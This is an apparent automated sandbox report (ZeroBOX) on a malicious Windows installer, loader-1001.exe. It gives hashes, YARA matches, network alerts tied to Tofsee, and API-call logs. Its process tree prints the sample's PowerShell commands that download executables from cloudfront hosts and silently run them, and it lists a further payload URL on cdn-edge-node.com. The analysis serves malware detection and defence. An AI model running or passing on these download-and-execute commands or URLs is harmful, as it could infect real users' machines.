Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 10, 2024, 10 a.m.	June 10, 2024, 10:07 a.m.

Size	49.7KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5	`58ca6d5068fa4fed981cf5ef8a04e4d5`
SHA256	`abc83f0b74c53bc98b6147e7fcc2a41c0a925bce79636b9557c0bb372e4f1205`
CRC32	`4C4F8E40`
ssdeep	`1536:XferrLkSRoe8C4UZsys0Dh1duFp+FI+PlQ:Xfi3k+oWDBDh1duFpDWlQ`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature NSIS_Installer - Null Soft Installer IsPE32 - (no description) UPX_Zero - UPX packed file

loader-1001.exe "C:\Users\test22\AppData\Local\Temp\loader-1001.exe"
2556
- cmd.exe "cmd" /c "C:\Users\test22\AppData\Local\Temp\nscF137.tmp\jan.bat"
  2692
  - powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1001','stat')"
    2756
  - powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1001','i0.exe')"
    2864
  - i0.exe i0.exe /verysilent /sub=1001
    2984
    - i0.tmp "C:\Users\test22\AppData\Local\Temp\is-HMERC.tmp\i0.tmp" /SL5="$90178,26775516,899584,C:\Users\test22\AppData\Local\Temp\i0.exe" /verysilent /sub=1001
      3056
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.67.53.27
cdn-edge-node.com	A 172.67.165.254 A 104.21.11.117	104.21.11.117
d22hce23hy1ej9.cloudfront.net	A 13.225.110.24 A 13.225.110.159 A 13.225.110.70 A 13.225.110.102	13.225.110.70
d2lvl7wmj7b91p.cloudfront.net	A 54.230.169.11 A 54.230.169.152 A 54.230.169.113 A 54.230.169.96	54.230.169.96
adblock2024.shop	A 172.67.176.247 A 104.21.43.83	104.21.43.83

IP Address	Status	Action
121.254.136.18	Active	Moloch
13.225.110.102	Active	Moloch
164.124.101.2	Active	Moloch
172.67.165.254	Active	Moloch
172.67.176.247	Active	Moloch
54.230.169.11	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49172 -> 13.225.110.102:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49163 -> 54.230.169.11:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 13.225.110.102:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49173 -> 172.67.165.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 172.67.176.247:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49172 13.225.110.102:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.cloudfront.net	fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1 192.168.56.101:49168 13.225.110.102:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.cloudfront.net	fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1 192.168.56.101:49163 54.230.169.11:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.cloudfront.net	fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1 192.168.56.101:49173 172.67.165.254:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=cdn-edge-node.com	a9:8d:72:17:ad:81:a1:43:81:37:a3:7e:bd:5d:9c:03:b8:8b:07:ff
TLSv1 192.168.56.101:49183 172.67.176.247:443	C=US, O=Let's Encrypt, CN=E1	CN=adblock2024.shop	f6:53:16:b6:98:89:7a:ae:57:00:89:be:e1:b6:81:59:8e:db:ed:ab

Queries for the computername (14 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 10, 2024, 10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 10, 2024, 10 a.m.			0	0
IsDebuggerPresent June 10, 2024, 10 a.m.			0	0
IsDebuggerPresent June 10, 2024, 10 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d5b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d6570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d6570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d6570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d6570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d6570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d6570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d59b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d59b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d59b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d6270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d63b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d66f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d6630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d6630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b0160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 10, 2024, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545e40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 10, 2024, 10 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.ndata

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ June 10, 2024, 10 a.m.	stacktrace: TMethodImplementationIntercept+0x14209d dbkFCallWrapperAddr-0xdc72b i0+0x1f7f15 @ 0x5f7f15 TMethodImplementationIntercept+0x13b21b dbkFCallWrapperAddr-0xe35ad i0+0x1f1093 @ 0x5f1093 TMethodImplementationIntercept+0x13c502 dbkFCallWrapperAddr-0xe22c6 i0+0x1f237a @ 0x5f237a TMethodImplementationIntercept+0x140e61 dbkFCallWrapperAddr-0xdd967 i0+0x1f6cd9 @ 0x5f6cd9 TMethodImplementationIntercept+0x140ed7 dbkFCallWrapperAddr-0xdd8f1 i0+0x1f6d4f @ 0x5f6d4f TMethodImplementationIntercept+0x135f43 dbkFCallWrapperAddr-0xe8885 i0+0x1ebdbb @ 0x5ebdbb TMethodImplementationIntercept+0x134c8d dbkFCallWrapperAddr-0xe9b3b i0+0x1eab05 @ 0x5eab05 TMethodImplementationIntercept+0x1ee923 dbkFCallWrapperAddr-0x2fea5 i0+0x2a479b @ 0x6a479b TMethodImplementationIntercept+0x1eeaa2 dbkFCallWrapperAddr-0x2fd26 i0+0x2a491a @ 0x6a491a TMethodImplementationIntercept+0x1fcbb2 dbkFCallWrapperAddr-0x21c16 i0+0x2b2a2a @ 0x6b2a2a TMethodImplementationIntercept+0x2108fc dbkFCallWrapperAddr-0xdecc i0+0x2c6774 @ 0x6c6774 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedfade exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 1636536 registers.edi: 0 registers.eax: 1636536 registers.ebp: 1636616 registers.edx: 0 registers.ebx: 2147614729 registers.esi: 4294967295 registers.ecx: 7	1	0	0
__exception__ June 10, 2024, 10 a.m.	stacktrace: TMethodImplementationIntercept+0x13fbef dbkFCallWrapperAddr-0xdebd9 i0+0x1f5a67 @ 0x5f5a67 TMethodImplementationIntercept+0x1ed87f dbkFCallWrapperAddr-0x30f49 i0+0x2a36f7 @ 0x6a36f7 TMethodImplementationIntercept+0x1ee939 dbkFCallWrapperAddr-0x2fe8f i0+0x2a47b1 @ 0x6a47b1 TMethodImplementationIntercept+0x1eeaa2 dbkFCallWrapperAddr-0x2fd26 i0+0x2a491a @ 0x6a491a TMethodImplementationIntercept+0x1fcbb2 dbkFCallWrapperAddr-0x21c16 i0+0x2b2a2a @ 0x6b2a2a TMethodImplementationIntercept+0x2108fc dbkFCallWrapperAddr-0xdecc i0+0x2c6774 @ 0x6c6774 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedfade exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 1637552 registers.edi: 0 registers.eax: 1637552 registers.ebp: 1637632 registers.edx: 0 registers.ebx: 34722800 registers.esi: 2 registers.ecx: 7	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

June 10, 2024, 10 a.m.

stacktrace:

TMethodImplementationIntercept+0x14209d dbkFCallWrapperAddr-0xdc72b i0+0x1f7f15 @ 0x5f7f15
TMethodImplementationIntercept+0x13b21b dbkFCallWrapperAddr-0xe35ad i0+0x1f1093 @ 0x5f1093
TMethodImplementationIntercept+0x13c502 dbkFCallWrapperAddr-0xe22c6 i0+0x1f237a @ 0x5f237a
TMethodImplementationIntercept+0x140e61 dbkFCallWrapperAddr-0xdd967 i0+0x1f6cd9 @ 0x5f6cd9
TMethodImplementationIntercept+0x140ed7 dbkFCallWrapperAddr-0xdd8f1 i0+0x1f6d4f @ 0x5f6d4f
TMethodImplementationIntercept+0x135f43 dbkFCallWrapperAddr-0xe8885 i0+0x1ebdbb @ 0x5ebdbb
TMethodImplementationIntercept+0x134c8d dbkFCallWrapperAddr-0xe9b3b i0+0x1eab05 @ 0x5eab05
TMethodImplementationIntercept+0x1ee923 dbkFCallWrapperAddr-0x2fea5 i0+0x2a479b @ 0x6a479b
TMethodImplementationIntercept+0x1eeaa2 dbkFCallWrapperAddr-0x2fd26 i0+0x2a491a @ 0x6a491a
TMethodImplementationIntercept+0x1fcbb2 dbkFCallWrapperAddr-0x21c16 i0+0x2b2a2a @ 0x6b2a2a
TMethodImplementationIntercept+0x2108fc dbkFCallWrapperAddr-0xdecc i0+0x2c6774 @ 0x6c6774
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xeedfade
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 1636536
registers.edi: 0
registers.eax: 1636536
registers.ebp: 1636616
registers.edx: 0
registers.ebx: 2147614729
registers.esi: 4294967295
registers.ecx: 7

__exception__

June 10, 2024, 10 a.m.

stacktrace:

TMethodImplementationIntercept+0x13fbef dbkFCallWrapperAddr-0xdebd9 i0+0x1f5a67 @ 0x5f5a67
TMethodImplementationIntercept+0x1ed87f dbkFCallWrapperAddr-0x30f49 i0+0x2a36f7 @ 0x6a36f7
TMethodImplementationIntercept+0x1ee939 dbkFCallWrapperAddr-0x2fe8f i0+0x2a47b1 @ 0x6a47b1
TMethodImplementationIntercept+0x1eeaa2 dbkFCallWrapperAddr-0x2fd26 i0+0x2a491a @ 0x6a491a
TMethodImplementationIntercept+0x1fcbb2 dbkFCallWrapperAddr-0x21c16 i0+0x2b2a2a @ 0x6b2a2a
TMethodImplementationIntercept+0x2108fc dbkFCallWrapperAddr-0xdecc i0+0x2c6774 @ 0x6c6774
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xeedfade
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 1637552
registers.edi: 0
registers.eax: 1637552
registers.ebp: 1637632
registers.edx: 0
registers.ebx: 34722800
registers.esi: 2
registers.ecx: 7

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1001
suspicious_features	GET method with no useragent header	suspicious_request	GET https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1001
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn-edge-node.com/online_security_mkl.exe

Performs some HTTP requests (5 events)

request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET https://d2lvl7wmj7b91p.cloudfront.net/load/load.php?c=1001
request	GET https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1001
request	GET https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1001
request	GET https://cdn-edge-node.com/online_security_mkl.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 285 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73322000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02660000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72421000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72422000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02732000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02733000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02734000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02767000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02752000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
